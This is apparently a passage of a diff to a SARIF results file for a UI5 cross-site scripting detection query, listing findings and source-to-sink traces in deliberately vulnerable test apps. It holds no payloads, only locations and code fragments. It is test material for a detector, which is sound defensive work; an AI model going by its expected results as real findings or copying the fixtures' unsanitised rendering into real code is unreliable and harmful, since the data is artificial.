"javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 118 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "faa1832c387d2ee5:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 119 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8291f53a2e235d15:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 120 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "63ace7b071639814:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "oSearch ... Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 11, - "endColumn" : 48 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 27, - "startColumn" : 34, - "endColumn" : 45 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 17, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 133, - "startColumn" : 8, - "endColumn" : 27 - } - }, - "message" : { - "text" : "oControl.getTitle()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - }, - "message" : { - "text" : "\"
T ...
\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 121 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 123 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fc87b07640e9d85:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 124 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5eac262ae765:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 125 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5ec8b0c3bb0d:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 7, - "startColumn" : 19, - "endColumn" : 37 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - }, - "region" : { - "startLine" : 14, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8ceecee7055f4fa2:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : { - "text" : "oInput.getValue()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 17, - "endColumn" : 42 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - }, - "region" : { - "startLine" : 5, - "startColumn" : 15, - "endColumn" : 33 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 